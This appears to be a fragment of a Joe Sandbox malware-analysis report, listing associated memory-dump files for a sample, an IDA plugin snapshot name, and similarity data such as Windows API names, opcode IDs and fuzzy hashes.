                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4